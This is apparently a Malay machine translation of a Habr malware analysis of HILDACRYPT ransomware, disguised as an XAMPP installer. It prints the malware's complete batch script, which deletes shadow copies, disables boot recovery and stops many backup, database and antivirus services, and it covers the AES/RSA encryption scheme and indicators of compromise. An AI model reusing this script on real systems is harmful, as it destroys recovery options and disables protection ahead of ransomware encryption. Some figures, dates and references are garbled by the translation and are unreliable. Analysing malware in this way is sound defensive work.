Hello, Habr! Sekali lagi, kita bercakap tentang versi terbaru perisian hasad daripada kategori Ransomware. HILDACRYPT ialah perisian tebusan baharu, ahli keluarga Hilda yang ditemui pada Ogos 2019, dinamakan sempena kartun Netflix yang digunakan untuk mengedarkan perisian tersebut. Hari ini kita berkenalan dengan ciri teknikal virus ransomware yang dikemas kini ini.
Dalam versi pertama Hilda ransomware, pautan ke satu disiarkan di Youtube siri kartun terkandung dalam surat tebusan. HILDACRYPT menyamar sebagai pemasang XAMPP yang sah, pengedaran Apache yang mudah dipasang yang merangkumi MariaDB, PHP dan Perl. Pada masa yang sama, cryptolocker mempunyai nama fail yang berbeza - xamp. Selain itu, fail ransomware tidak mempunyai tandatangan elektronik.
Analisis statik
Perisian tebusan terkandung dalam fail PE32 .NET yang ditulis untuk MS Windows. Saiznya ialah 135 bait. Kedua-dua kod program utama dan kod program defender ditulis dalam C#. Mengikut tarikh penyusunan dan setem masa, binari telah dicipta pada 168 September 14.
Menurut Detect It Easy, perisian tebusan diarkibkan menggunakan Confuser dan ConfuserEx, tetapi obfuscator ini adalah sama seperti sebelumnya, hanya ConfuserEx adalah pengganti Confuser, jadi tandatangan kod mereka adalah serupa.
HILDACRYPT sememangnya dibungkus dengan ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor serangan
Kemungkinan besar, perisian tebusan itu ditemui pada salah satu tapak pengaturcaraan web, menyamar sebagai program XAMPP yang sah.
Keseluruhan rantaian jangkitan boleh dilihat dalam .
Kekeliruan
Rentetan perisian tebusan disimpan dalam bentuk yang disulitkan. Apabila dilancarkan, HILDACRYPT menyahsulitnya menggunakan Base64 dan AES-256-CBC.
Pemasangan
Pertama sekali, perisian tebusan mencipta folder dalam %AppDataRoaming% di mana parameter GUID (Pengecam Unik Global) dijana secara rawak. Dengan menambahkan fail kelawar ke lokasi ini, virus ransomware melancarkannya menggunakan cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & keluar
Ia kemudian mula melaksanakan skrip kelompok untuk melumpuhkan ciri atau perkhidmatan sistem.
Skrip mengandungi senarai panjang arahan yang memusnahkan salinan bayangan, melumpuhkan pelayan SQL, sandaran dan penyelesaian antivirus.
Contohnya, ia tidak berjaya menghentikan perkhidmatan Sandaran Acronis. Selain itu, ia menyerang sistem sandaran dan penyelesaian antivirus daripada vendor berikut: Veeam, Sophos, Kaspersky, McAfee dan lain-lain.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Sebaik sahaja perkhidmatan dan proses yang dinyatakan di atas dilumpuhkan, cryptolocker mengumpul maklumat tentang semua proses yang sedang berjalan menggunakan arahan senarai tugas untuk memastikan semua perkhidmatan yang diperlukan tidak berfungsi.
senarai tugas v/fo csv
Perintah ini memaparkan senarai terperinci proses yang sedang berjalan, unsur-unsurnya dipisahkan oleh tanda ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Selepas semakan ini, perisian tebusan memulakan proses penyulitan.
Penyulitan
Penyulitan fail
HILDACRYPT meneliti semua kandungan cakera keras yang ditemui, kecuali untuk folder Recycle.Bin dan Reference AssembliesMicrosoft. Yang terakhir mengandungi fail dll kritikal, pdb, dsb. untuk aplikasi .Net yang boleh menjejaskan pengendalian perisian tebusan. Untuk mencari fail yang akan disulitkan, senarai sambungan berikut digunakan:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Perisian tebusan menggunakan algoritma AES-256-CBC untuk menyulitkan fail pengguna. Saiz kunci ialah 256 bit dan saiz vektor permulaan (IV) ialah 16 bait.
Dalam tangkapan skrin berikut, nilai byte_2 dan byte_1 diperoleh secara rawak menggunakan GetBytes().
Kunci
ВИ
Fail yang disulitkan mempunyai sambungan HCY!.. Ini adalah contoh fail yang disulitkan. Kunci dan IV yang disebutkan di atas telah dicipta untuk fail ini.
Penyulitan kunci
Cryptolocker menyimpan kunci AES yang dijana dalam fail yang disulitkan. Bahagian pertama fail yang disulitkan mempunyai pengepala yang mengandungi data seperti HILDACRYPT, KEY, IV, FileLen dalam format XML dan kelihatan seperti ini:
Penyulitan kunci AES dan IV dilakukan menggunakan RSA-2048, dan pengekodan dilakukan menggunakan Base64. Kunci awam RSA disimpan dalam badan cryptolocker dalam salah satu rentetan yang disulitkan dalam format XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Kunci awam RSA digunakan untuk menyulitkan kunci fail AES. Kunci awam RSA dikodkan Base64 dan terdiri daripada modulus dan eksponen awam 65537. Penyahsulitan memerlukan kunci persendirian RSA, yang dimiliki oleh penyerang.
Selepas penyulitan RSA, kunci AES dikodkan menggunakan Base64 yang disimpan dalam fail yang disulitkan.
Mesej tebusan
Setelah penyulitan selesai, HILDACRYPT menulis fail html ke folder di mana ia menyulitkan fail. Pemberitahuan perisian tebusan mengandungi dua alamat e-mel di mana mangsa boleh menghubungi penyerang.
Notis peras ugut juga mengandungi baris "No loli is safe;)" - merujuk kepada watak anime dan manga dengan penampilan gadis kecil yang diharamkan di Jepun.
Output
HILDACRYPT, keluarga perisian tebusan baharu, telah mengeluarkan versi baharu. Model penyulitan menghalang mangsa daripada menyahsulit fail yang disulitkan oleh perisian tebusan. Cryptolocker menggunakan kaedah perlindungan aktif untuk melumpuhkan perkhidmatan perlindungan yang berkaitan dengan sistem sandaran dan penyelesaian antivirus. Pengarang HILDACRYPT ialah peminat siri animasi Hilda yang ditunjukkan di Netflix, pautan ke treler yang terkandung dalam surat pembelian untuk versi program sebelumnya.
Biasanya, и boleh melindungi komputer anda daripada perisian tebusan HILDACRYPT, dan pembekal mempunyai keupayaan untuk melindungi pelanggan mereka dengan . Perlindungan dipastikan oleh fakta bahawa penyelesaian ini termasuk termasuk bukan sahaja sandaran, tetapi juga sistem keselamatan bersepadu kami - Dikuasakan oleh model pembelajaran mesin dan berdasarkan heuristik tingkah laku, teknologi yang mampu menentang ancaman perisian tebusan sifar hari tidak seperti yang lain.
Petunjuk kompromi
Sambungan fail HCY!
HILDACRYPTReadMe.html
xamp.exe dengan satu huruf "p" dan tiada tandatangan digital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Sumber: www.habr.com